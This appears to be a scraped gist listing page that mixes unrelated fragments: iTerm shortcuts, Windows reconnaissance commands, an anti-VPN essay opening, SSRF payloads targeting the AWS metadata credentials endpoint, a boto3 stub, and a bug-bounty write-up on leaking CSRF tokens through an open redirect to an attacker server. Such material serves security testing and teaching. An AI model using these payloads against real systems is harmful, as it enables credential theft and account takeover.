Function | Shortcut |
---|---|
New Tab | ⌘ + T |
Close Tab or Window | ⌘ + W (same as many mac apps) |
Go to Tab | ⌘ + Number Key (ie: ⌘2 is 2nd tab) |
Go to Split Pane by Direction | ⌘ + Option + Arrow Key |
Cycle iTerm Windows | ⌘ + backtick (true of all mac apps and works with desktops/mission control) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// What system are we connected to? | |
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
// Get the hostname and username (if available) | |
hostname | |
echo %username% | |
// Get users | |
net users | |
net user [username] |
No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.
Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.
- A Russian translation of this article can be found here, contributed by Timur Demin.
- A Turkish translation can be found here, contributed by agyild.
- There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## IPv6 Tests | |
http://[::ffff:169.254.169.254] | |
http://[0:0:0:0:0:ffff:169.254.169.254] | |
## AWS | |
# Amazon Web Services (No Header Required) | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from boto3.session import Session | |
from botocore.client import Config | |
from botocore.handlers import set_list_objects_encoding_type_url | |
import boto3 | |
ACCESS_KEY = "xx" | |
SECRET_KEY = "yy" | |
boto3.set_stream_logger('') |
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.
- There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
- User loads https://example.com/?code=VALUE
- Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header
x-csrf-token
set to the CSRF token for the session of the userGET /verify/VALUE HTTP/1.1 Host: example.com